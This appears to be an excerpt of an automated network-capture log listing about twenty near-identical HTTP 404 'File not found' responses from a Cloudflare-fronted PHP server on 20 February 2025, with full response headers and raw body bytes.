Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CSyVLXe4%2FOFJZvsVXAotIyzKR6jsQsbjC0ToepFZulGv6zQ7n8hY1W3R%2Fo%2BvMJs7TJOBqjY7VXjsC1Tbl%2BCeAZpa%2FYvBu0M2vPFC1pueLEu8k%2FlZUOmlxg3GNc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0fad5d7a5e82-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1643&rtt_var=821&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQz1VExqHVT8aUOmQZAqyzUeNKkh7PX0Jt43zzKwMEoQD0%2Bb1uLdYyeG6TbVPWTZ7ahZ29JImt%2BCYqz%2BfhacNfkDh0MMUL96myBHl2UoJreFfiXIrV10nD9Nb7o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0fb9dd8b4334-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64sgVpOJZcZlcGaNh%2FOrmZav3ou6o%2FIwU5UfoIoTVo17xOG%2BswjQ%2BUC2%2FMSjEwSbT7JvCcPOMIXI3CGznO719yI7%2BSvWkuZpv4ozYOB3F9JS26zlhVYueT4cSSw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0fc61b5b728d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYHXuSQnLYzb%2BsM%2BYlUxIzOloi6fzCJOrm1d%2FWHr2MBA8UZlwIlzn%2Bvzzk6YT6kkfMK0U7L9PndoSdKp8zKkHihcQi15jqfYjKBgTqv60kt%2BbIA%2BWgR%2FhCBXuSg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0fd1fe06424d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2072&rtt_var=1036&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiDxQIOoN94EiFxT5eepoWE0AdU6m7l94m10U8x1d6jNhQkDwiGdubTQQGI4DBIHp23gtoNJFRVmQYseR8pOvP9TKf1cXwa2bQ%2B7MaXBhRupyWR4llVKd9FAbe8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0fe95d530f90-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qyREgKY5Li4kyXz5zU4Ga50lBEkA7HDge1aJVDwScs5dNJVUG9UnQIuqyfKBT5NEG7%2Fp5rYfifWXyJ8U3zqSNKPyKuOj0hrom1ZjG54wnQktzVFGeLU8TBlKb5Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f1001e81b0f71-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1718&rtt_var=859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7H0vSK4bXMnVLgG1DGxX50lb0TzKB2M9b9YxuKYCSsQi9P6vt9v5QCts8REexpG34O%2BRNIQLmti%2FZhQUnz7Z13uWN1tn3E0%2BQSJCJps2%2BQI3rc0F%2BWeN2PcNVM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f101a1e774307-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ryEi2yczjMc1CXC1nlXpMZiPtiAmLOvsS8KQgCTFhwSVevJu7DebWj1Ekr9wHkE%2B46WLc88kFKE7gLCjuXmR1wPAVTnbxOs1rl6lPHt2I0JRfdGf4MU2PWMx0vg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10267e9d5e65-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1839&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luhCtyiybYpQARM8VGLJikOncmIWcWUs9h2f99%2BeLUSPRWkMMwTrCsUSyMxmC3W6S7ZmTU54s4zLtvk4YbhyW%2Fe0OnctETctP%2F9jDsB2QAeBk81eIgXNDt6uJVM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10323a1142f8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1834&rtt_var=917&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RR5GcOYM84hP52XKlEvdqa9sYIXnaRQy9Do4xW6ORavjb8a%2BbupWvebzTqIT29AGQnJJQDYdaSvmoWxKfei4vIvGz9ttR00D7YVNPuMBlHzr60DmCJ%2F0GNVTBCs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f1049ed781a0f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2261&min_rtt=2261&rtt_var=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNgis6F7CG5UVV%2BtoK%2BZJRJfp%2BiJi0nRf9piyiB0QO76DoKgDQOOkcoS7cKcIwx8mhc8Mje7OYNftD3gWczF9NfiMq73tGvvi8DFm0AbSPmlIf9WsIhez%2FE0ImY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10626dec4264-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H86zjjDzugk2SKSgK0%2B2b33ruaKWJbJ5wBD72dX8KL879DRHp%2BbU2EYrpu%2FncJ8IFqKlK8sdTI8lWKPm6hEBrDIj62zKuc7KR7nbL7VD2F2EBVAfvkhZxXq5Xhs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f106ecb77efa5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2007&rtt_var=1003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0w%2B2Ve3wJfkoIg6x7YUT1mQKg9pipP6MuzHcOwSsqqIFiCxMsSwtxrQD8G2gOAKRx0ekqebu3auoXgA1KE%2Fw3ApGORVKNIBdtfVLMCGiDG6ekx3nrM9V9ZPbkUM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f107afc3b7285-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Mwm8TyHjX6dT0ZTErzEhothkzyUVXdWZMfCo3x2HiVA4xNhdBh0hBMyL13r8ol7B5JZLuGU%2BAVLE2LyDTOyrWt9uxj3z7HGGTJyKrWcNl5hjp88Q4nfFYm%2Bn4M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10874c3342c7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL2Z9xhX1ZqgUH3XA7OyK4xeXwgCbI83sYAMO7woifrd70VxzwbwMUODb09ruF1kdcXQMEXfNTFH26uPGDVN4iPIEh%2BedAegMkQDnLaEhKmUwCL%2BbKU3djS43vI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f1093a9c47c9a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=2006&rtt_var=1003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkPerHTIPef%2FmUsrqSN4aqH2GRW0k%2BMdOeUIQfV6rMY9Ke20%2BZe1sZyAJBeeecNbNxesQuH5une33glCcQo739vNz9w7Nu4PyvxShYRz53s5z8lAHc%2FwD7Rp%2FdY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10a19b9d43ef-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLbN0fYlqK4Y8jCt2xuuF%2B1KJzd3LiQB0vGRW1HjRWQd9pmtknRqCXpk%2BxjUatqGX5taen0TzAcIJq9AVLa7mJcGyBJpvOgCOxRhPK22jjH8YYOwtnmN%2B4h0rVQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10adccfec354-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1515&min_rtt=1515&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvX9wzInL9qkGYjd5vJzsQHy76J%2F2CIFX3UR0GdlL8dEN3BB3RJMOAnoQf3uKnhvF1phnmxFmh%2Fp0%2BWkRSSUdZOM7TC0VzsL9J%2FnXU5WF7XysQAE%2FBmKiEFrXvU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10b9eba3c472-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qjk23z3D3Gnv%2BhycVzvJgORXqfTAoRC3Vogy3NRUBOOIfsJFTCRgffCOb4cXWYjbXkQQoO9NVKA1kPobVPl1vHpk0AWggSZKlr5JUUgx9WMstN2UcmhKEoLp93c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10c62dca0f4a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1446&rtt_var=723&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fk7K3ksphLqXuWzK0jS24iTB%2F048o0OSX7pMUb5D17ckQEThyM%2BmnMfhBkDJLsvllTpfiFV7WEmhe2%2F%2BoB1pWOvg%2BNYyjZgbQfnoXu95tte2AQJrt6T44DHav5k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10d27c94335a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1928&rtt_var=964&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jy%2FT%2BYtbpRmCjQxh5vKdm7I8L6%2Bw9DazA6MvHh0nOe0CNw7gcJFmV3tCaqGNDY3sXhIJ7IoeLcZiVOr75hujUPpXg%2BuZHbNBEdHFIa%2Bi6MwC7ZqrHhqvDazSBYw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f10ea4ee8433e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wp%2F%2BBx3M2kGPkDREah%2BuZUjvxG4iEW4x%2FO%2FpkE%2Fs6GUfW0DOXV6CWIwNYdJWgG%2FJkNNU9wmwONc279DLZwR0BLoU79dVsAGTEbiMs2GRwdw%2BO4WmCL0SGCLR7mE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f1103bb662363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2043&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tyxcWMyBNruPt4jPgxyoLfNS5PW6QXzF12UQxR3ybeS%2B3IgghaGHJILx0c8OJ3IOK7EmTUUKkjjh8QZvwBCMaVTQKLeC2pb%2FgcJuWsVeg5mDwIWlAFfaNod%2FX0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f11102fbdc32e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:08:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4prgj4vmP%2FBqbgfpd%2F2QaK1w0KDx%2FMpxstnZjLrO%2B2Uxvm16fBe968c%2BQP0wPVKX1PzjJBov%2BA7G2kHFTGA732jDDItSzCn2sOYpD70LiZS2d9lQOx8m5mwZYM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f111c5cee5e64-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
